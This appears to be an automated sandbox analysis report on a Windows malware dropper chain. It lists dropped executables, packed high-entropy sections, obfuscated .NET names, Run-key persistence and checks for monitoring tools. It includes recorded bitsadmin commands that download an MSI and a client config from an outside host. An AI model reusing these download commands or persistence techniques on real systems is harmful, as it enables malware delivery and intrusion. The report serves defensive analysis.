Source: mAtJWNv.exe.11.dr, RhN4VuXG0bkU6RkQbjv.cs	.Net Code: D0mHsQPh9h

Source: mIrI3a9.exe.11.dr

Static PE information: 0xC865B9A0 [Thu Jul 16 07:24:16 2076 UTC]

Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe

Code function: 25_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

25_2_00406328

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: FvbuInU[1].exe.11.dr	Static PE information: real checksum: 0x20b4c1 should be: 0x202360
Source: PfOHmro.exe0.11.dr	Static PE information: real checksum: 0x0 should be: 0x202bf
Source: ADFoyxP.exe.11.dr	Static PE information: real checksum: 0x381fe3 should be: 0x3875ef
Source: rapes.exe.0.dr	Static PE information: real checksum: 0x1e3d54 should be: 0x1e65ec
Source: V0Bt74c[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x5f210
Source: random[1].exe0.11.dr	Static PE information: real checksum: 0x1b4e3a should be: 0x1bdb72
Source: ADFoyxP[1].exe.11.dr	Static PE information: real checksum: 0x381fe3 should be: 0x3875ef
Source: 26335e66aa.exe.11.dr	Static PE information: real checksum: 0x2b8dfd should be: 0x2b6c2b
Source: zY9sqWs.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x78f31
Source: v6Oqdnc[1].exe.11.dr	Static PE information: real checksum: 0x200c76 should be: 0x200546
Source: FvbuInU.exe.11.dr	Static PE information: real checksum: 0x20b4c1 should be: 0x202360
Source: v6Oqdnc.exe.11.dr	Static PE information: real checksum: 0x200c76 should be: 0x200546
Source: 61c1a86413.exe.11.dr	Static PE information: real checksum: 0x30c49a should be: 0x30e3c9
Source: afdbfd8fdc.exe.11.dr	Static PE information: real checksum: 0x1b4e3a should be: 0x1bdb72
Source: random[1].exe1.11.dr	Static PE information: real checksum: 0x2b8dfd should be: 0x2b6c2b
Source: mIrI3a9.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0xfb02
Source: PfOHmro.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x202bf
Source: HmngBpR.exe.11.dr	Static PE information: real checksum: 0x9afed0 should be: 0x9b0cd0
Source: ReK7Ewx.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x14350a
Source: random[1].exe.11.dr	Static PE information: real checksum: 0x30c49a should be: 0x30e3c9
Source: CgmaT61[1].exe.11.dr	Static PE information: real checksum: 0x1fe9f5 should be: 0x1f9dcb
Source: ReK7Ewx[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x14350a
Source: zY9sqWs[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x78f31
Source: V0Bt74c.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x5f210
Source: yUI6F6C.exe.11.dr	Static PE information: real checksum: 0x1fe9f5 should be: 0x1f9dcb
Source: ReK7Ewx.exe0.11.dr	Static PE information: real checksum: 0x0 should be: 0x14350a
Source: HmngBpR[1].exe.11.dr	Static PE information: real checksum: 0x9afed0 should be: 0x9b0cd0
Source: random.exe	Static PE information: real checksum: 0x1e3d54 should be: 0x1e65ec
Source: yUI6F6C[1].exe.11.dr	Static PE information: real checksum: 0x1fe9f5 should be: 0x1f9dcb
Source: PfOHmro[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x202bf
Source: CgmaT61.exe.11.dr	Static PE information: real checksum: 0x1fe9f5 should be: 0x1f9dcb

Source: random.exe	Static PE information: section name:
Source: random.exe	Static PE information: section name: .idata
Source: random.exe	Static PE information: section name:
Source: random.exe	Static PE information: section name: zmpqmbag
Source: random.exe	Static PE information: section name: jncfbsbi
Source: random.exe	Static PE information: section name: .taggant
Source: rapes.exe.0.dr	Static PE information: section name:
Source: rapes.exe.0.dr	Static PE information: section name: .idata
Source: rapes.exe.0.dr	Static PE information: section name:
Source: rapes.exe.0.dr	Static PE information: section name: zmpqmbag
Source: rapes.exe.0.dr	Static PE information: section name: jncfbsbi
Source: rapes.exe.0.dr	Static PE information: section name: .taggant
Source: PfOHmro[1].exe.11.dr	Static PE information: section name: .CSS
Source: PfOHmro.exe.11.dr	Static PE information: section name: .CSS
Source: FvbuInU[1].exe.11.dr	Static PE information: section name:
Source: FvbuInU[1].exe.11.dr	Static PE information: section name: .idata
Source: FvbuInU[1].exe.11.dr	Static PE information: section name:
Source: FvbuInU[1].exe.11.dr	Static PE information: section name: kzbupdkl
Source: FvbuInU[1].exe.11.dr	Static PE information: section name: bmqfvobi
Source: FvbuInU[1].exe.11.dr	Static PE information: section name: .taggant
Source: FvbuInU.exe.11.dr	Static PE information: section name:
Source: FvbuInU.exe.11.dr	Static PE information: section name: .idata
Source: FvbuInU.exe.11.dr	Static PE information: section name:
Source: FvbuInU.exe.11.dr	Static PE information: section name: kzbupdkl
Source: FvbuInU.exe.11.dr	Static PE information: section name: bmqfvobi
Source: FvbuInU.exe.11.dr	Static PE information: section name: .taggant
Source: v6Oqdnc[1].exe.11.dr	Static PE information: section name:
Source: v6Oqdnc[1].exe.11.dr	Static PE information: section name: .idata
Source: v6Oqdnc[1].exe.11.dr	Static PE information: section name:
Source: v6Oqdnc[1].exe.11.dr	Static PE information: section name: wnvsgzkd
Source: v6Oqdnc[1].exe.11.dr	Static PE information: section name: vzzmrlzq
Source: v6Oqdnc[1].exe.11.dr	Static PE information: section name: .taggant
Source: v6Oqdnc.exe.11.dr	Static PE information: section name:
Source: v6Oqdnc.exe.11.dr	Static PE information: section name: .idata
Source: v6Oqdnc.exe.11.dr	Static PE information: section name:
Source: v6Oqdnc.exe.11.dr	Static PE information: section name: wnvsgzkd
Source: v6Oqdnc.exe.11.dr	Static PE information: section name: vzzmrlzq
Source: v6Oqdnc.exe.11.dr	Static PE information: section name: .taggant
Source: HmngBpR[1].exe.11.dr	Static PE information: section name: .didata
Source: HmngBpR.exe.11.dr	Static PE information: section name: .didata
Source: PfOHmro.exe0.11.dr	Static PE information: section name: .CSS
Source: mAtJWNv[1].exe.11.dr	Static PE information: section name: .css
Source: mAtJWNv.exe.11.dr	Static PE information: section name: .css
Source: CgmaT61[1].exe.11.dr	Static PE information: section name:
Source: CgmaT61[1].exe.11.dr	Static PE information: section name: .idata
Source: CgmaT61[1].exe.11.dr	Static PE information: section name:
Source: CgmaT61[1].exe.11.dr	Static PE information: section name: mzhehwmc
Source: CgmaT61[1].exe.11.dr	Static PE information: section name: roelxloa
Source: CgmaT61[1].exe.11.dr	Static PE information: section name: .taggant
Source: CgmaT61.exe.11.dr	Static PE information: section name:
Source: CgmaT61.exe.11.dr	Static PE information: section name: .idata
Source: CgmaT61.exe.11.dr	Static PE information: section name:
Source: CgmaT61.exe.11.dr	Static PE information: section name: mzhehwmc
Source: CgmaT61.exe.11.dr	Static PE information: section name: roelxloa
Source: CgmaT61.exe.11.dr	Static PE information: section name: .taggant
Source: yUI6F6C[1].exe.11.dr	Static PE information: section name:
Source: yUI6F6C[1].exe.11.dr	Static PE information: section name: .idata
Source: yUI6F6C[1].exe.11.dr	Static PE information: section name:
Source: yUI6F6C[1].exe.11.dr	Static PE information: section name: mzhehwmc
Source: yUI6F6C[1].exe.11.dr	Static PE information: section name: roelxloa
Source: yUI6F6C[1].exe.11.dr	Static PE information: section name: .taggant
Source: yUI6F6C.exe.11.dr	Static PE information: section name:
Source: yUI6F6C.exe.11.dr	Static PE information: section name: .idata
Source: yUI6F6C.exe.11.dr	Static PE information: section name:
Source: yUI6F6C.exe.11.dr	Static PE information: section name: mzhehwmc
Source: yUI6F6C.exe.11.dr	Static PE information: section name: roelxloa
Source: yUI6F6C.exe.11.dr	Static PE information: section name: .taggant
Source: V0Bt74c[1].exe.11.dr	Static PE information: section name: .CSS
Source: V0Bt74c.exe.11.dr	Static PE information: section name: .CSS
Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: .idata
Source: random[1].exe.11.dr	Static PE information: section name: ybnaxczm
Source: random[1].exe.11.dr	Static PE information: section name: llftpper
Source: random[1].exe.11.dr	Static PE information: section name: .taggant
Source: 61c1a86413.exe.11.dr	Static PE information: section name:
Source: 61c1a86413.exe.11.dr	Static PE information: section name: .idata
Source: 61c1a86413.exe.11.dr	Static PE information: section name: ybnaxczm
Source: 61c1a86413.exe.11.dr	Static PE information: section name: llftpper
Source: 61c1a86413.exe.11.dr	Static PE information: section name: .taggant
Source: random[1].exe0.11.dr	Static PE information: section name:
Source: random[1].exe0.11.dr	Static PE information: section name: .idata
Source: random[1].exe0.11.dr	Static PE information: section name:
Source: random[1].exe0.11.dr	Static PE information: section name: pfyfukxi
Source: random[1].exe0.11.dr	Static PE information: section name: fsmwngil
Source: random[1].exe0.11.dr	Static PE information: section name: .taggant
Source: afdbfd8fdc.exe.11.dr	Static PE information: section name:
Source: afdbfd8fdc.exe.11.dr	Static PE information: section name: .idata
Source: afdbfd8fdc.exe.11.dr	Static PE information: section name:
Source: afdbfd8fdc.exe.11.dr	Static PE information: section name: pfyfukxi
Source: afdbfd8fdc.exe.11.dr	Static PE information: section name: fsmwngil
Source: afdbfd8fdc.exe.11.dr	Static PE information: section name: .taggant
Source: random[1].exe1.11.dr	Static PE information: section name:
Source: random[1].exe1.11.dr	Static PE information: section name: .idata
Source: random[1].exe1.11.dr	Static PE information: section name: nvsoljpq
Source: random[1].exe1.11.dr	Static PE information: section name: nrupdtbz
Source: random[1].exe1.11.dr	Static PE information: section name: .taggant
Source: 26335e66aa.exe.11.dr	Static PE information: section name:
Source: 26335e66aa.exe.11.dr	Static PE information: section name: .idata
Source: 26335e66aa.exe.11.dr	Static PE information: section name: nvsoljpq
Source: 26335e66aa.exe.11.dr	Static PE information: section name: nrupdtbz
Source: 26335e66aa.exe.11.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 11_2_00DA9FC1 push ecx; ret	11_2_00DA9FD4
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 15_2_048CFAA4 push eax; iretd	15_2_048CFAA5
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 15_2_0494F7E4 push eax; iretd	15_2_0494F7E5
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 49_2_00D9F668 pushad ; retf	49_2_00D9F669
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 49_2_00D9F634 pushad ; retf	49_2_00D9F635
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 49_2_0434F774 push esp; retn 004Bh	49_2_0434F775
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FD0DE6 push ecx; ret	51_2_00FD0DF9

Source: random.exe	Static PE information: section name: entropy: 7.9846762099294
Source: random.exe	Static PE information: section name: zmpqmbag entropy: 7.952831791896438
Source: rapes.exe.0.dr	Static PE information: section name: entropy: 7.9846762099294
Source: rapes.exe.0.dr	Static PE information: section name: zmpqmbag entropy: 7.952831791896438
Source: FvbuInU[1].exe.11.dr	Static PE information: section name: entropy: 7.20142058220356
Source: FvbuInU[1].exe.11.dr	Static PE information: section name: kzbupdkl entropy: 7.952571902495584
Source: FvbuInU.exe.11.dr	Static PE information: section name: entropy: 7.20142058220356
Source: FvbuInU.exe.11.dr	Static PE information: section name: kzbupdkl entropy: 7.952571902495584
Source: v6Oqdnc[1].exe.11.dr	Static PE information: section name: entropy: 7.2384378597518175
Source: v6Oqdnc[1].exe.11.dr	Static PE information: section name: wnvsgzkd entropy: 7.953215854490117
Source: v6Oqdnc.exe.11.dr	Static PE information: section name: entropy: 7.2384378597518175
Source: v6Oqdnc.exe.11.dr	Static PE information: section name: wnvsgzkd entropy: 7.953215854490117
Source: CgmaT61[1].exe.11.dr	Static PE information: section name: entropy: 7.169833059547756
Source: CgmaT61[1].exe.11.dr	Static PE information: section name: mzhehwmc entropy: 7.953537250716954
Source: CgmaT61.exe.11.dr	Static PE information: section name: entropy: 7.169833059547756
Source: CgmaT61.exe.11.dr	Static PE information: section name: mzhehwmc entropy: 7.953537250716954
Source: yUI6F6C[1].exe.11.dr	Static PE information: section name: entropy: 7.169833059547756
Source: yUI6F6C[1].exe.11.dr	Static PE information: section name: mzhehwmc entropy: 7.953537250716954
Source: yUI6F6C.exe.11.dr	Static PE information: section name: entropy: 7.169833059547756
Source: yUI6F6C.exe.11.dr	Static PE information: section name: mzhehwmc entropy: 7.953537250716954
Source: random[1].exe.11.dr	Static PE information: section name: entropy: 7.159764886939984
Source: 61c1a86413.exe.11.dr	Static PE information: section name: entropy: 7.159764886939984
Source: random[1].exe0.11.dr	Static PE information: section name: pfyfukxi entropy: 7.953005959435201
Source: afdbfd8fdc.exe.11.dr	Static PE information: section name: pfyfukxi entropy: 7.953005959435201
Source: random[1].exe1.11.dr	Static PE information: section name: entropy: 7.763730137577957
Source: 26335e66aa.exe.11.dr	Static PE information: section name: entropy: 7.763730137577957

Source: mAtJWNv[1].exe.11.dr, Ce716WgjPJi1to0DwO.cs	High entropy of concatenated method names: 'eGZi6juOTvHuM3AqcMT', 'QImVx8u9prVJ6Q5ZhQE', 'xb8D5o8ice', 'fJWJrPuWkv2n2wknEjv', 'uGltkNu6BSessyYBViZ', 'C12RuXuxuWYaGcE7Doo', 'KO2BOSuQ5hwVCjxjiju', 'zgeLtquCOOSgYpfX44p', 'gjwjUouM8jUopDwUTXY', 'l52Wk9u0T44L3mo9PjS'
Source: mAtJWNv[1].exe.11.dr, gCnUgIvQu4UM8Qqkpr.cs	High entropy of concatenated method names: 'WKqgG71Jxr', 'GjNGI3dLvTpx0QRqhsw', 'jtT0jOdcN9fvs9pFR08', 'rRv5uvdqXA0lhjq3uIo', 'skpWCGdM30wyvKEnUVd', 'iBhaNId0SrTCk4ETfBw', 'b6ZCYEdG35m0wuZYCm6', 'BOeTaHdyC6WjDBnT867', 'CJ56DkdKD03B6aTUjsf'
Source: mAtJWNv[1].exe.11.dr, RhN4VuXG0bkU6RkQbjv.cs	High entropy of concatenated method names: 'oOrTcWmPb5', 'NH0TqtpkSe', 'omwTGnVxjh', 'iGWTyYs8lA', 'lU4TKZlNmh', 'e5STIWmrST', 'YeYTRC9Ljo', 'kQvXZ7gBkT', 'iOITUqHIfj', 'Fh4T2okLG1'
Source: mAtJWNv.exe.11.dr, Ce716WgjPJi1to0DwO.cs	High entropy of concatenated method names: 'eGZi6juOTvHuM3AqcMT', 'QImVx8u9prVJ6Q5ZhQE', 'xb8D5o8ice', 'fJWJrPuWkv2n2wknEjv', 'uGltkNu6BSessyYBViZ', 'C12RuXuxuWYaGcE7Doo', 'KO2BOSuQ5hwVCjxjiju', 'zgeLtquCOOSgYpfX44p', 'gjwjUouM8jUopDwUTXY', 'l52Wk9u0T44L3mo9PjS'
Source: mAtJWNv.exe.11.dr, gCnUgIvQu4UM8Qqkpr.cs	High entropy of concatenated method names: 'WKqgG71Jxr', 'GjNGI3dLvTpx0QRqhsw', 'jtT0jOdcN9fvs9pFR08', 'rRv5uvdqXA0lhjq3uIo', 'skpWCGdM30wyvKEnUVd', 'iBhaNId0SrTCk4ETfBw', 'b6ZCYEdG35m0wuZYCm6', 'BOeTaHdyC6WjDBnT867', 'CJ56DkdKD03B6aTUjsf'
Source: mAtJWNv.exe.11.dr, RhN4VuXG0bkU6RkQbjv.cs	High entropy of concatenated method names: 'oOrTcWmPb5', 'NH0TqtpkSe', 'omwTGnVxjh', 'iGWTyYs8lA', 'lU4TKZlNmh', 'e5STIWmrST', 'YeYTRC9Ljo', 'kQvXZ7gBkT', 'iOITUqHIfj', 'Fh4T2okLG1'

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\789919\Occupation.com			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	File created: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com			Jump to dropped file

Tries to download files via bitsadmin

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\user~1\AppData\Local\Temp\vrep_install\vrep.msi"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\user~1\AppData\Local\Temp\vrep_install\vrep.msi"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer "DownloadClient" https://authenticatior.com/Client32.ini "C:\Users\user~1\AppData\Local\Temp\vrep_install\Client32.ini"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\user~1\AppData\Local\Temp\vrep_install\vrep.msi"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer "DownloadClient" https://authenticatior.com/Client32.ini "C:\Users\user~1\AppData\Local\Temp\vrep_install\Client32.ini"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\user~1\AppData\Local\Temp\vrep_install\vrep.msi"

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\PfOHmro[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10141680101\26335e66aa.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	File created: C:\Users\user\AppData\Local\Temp\EdgeBHO.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mAtJWNv[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10141640101\ReK7Ewx.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\v6Oqdnc[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\FvbuInU[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10141540101\v6Oqdnc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10141580101\mAtJWNv.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10141700101\b794b2f69e.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10141720101\a2528907a0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10141650101\61c1a86413.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10141660101\afdbfd8fdc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	File created: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10141630101\V0Bt74c.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	File created: C:\Users\user\AppData\Roaming\a.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10141610101\ADFoyxP.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\ReK7Ewx[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mIrI3a9[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\ADFoyxP[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10141530101\FvbuInU.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10141550101\HmngBpR.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\CgmaT61[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10141690101\8c12a2b1f0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	File created: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10141670101\7fd483a527.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\HmngBpR[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10141560101\PfOHmro.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10141730101\d8be899fe4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10141620101\yUI6F6C.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10141590101\CgmaT61.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\zY9sqWs[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\yUI6F6C[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\random.exe	File created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10141740101\48726a724d.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\V0Bt74c[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10141600101\zY9sqWs.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[3].exe	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7fd483a527.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 26335e66aa.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run afdbfd8fdc.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 61c1a86413.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b794b2f69e.exe	Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\random.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
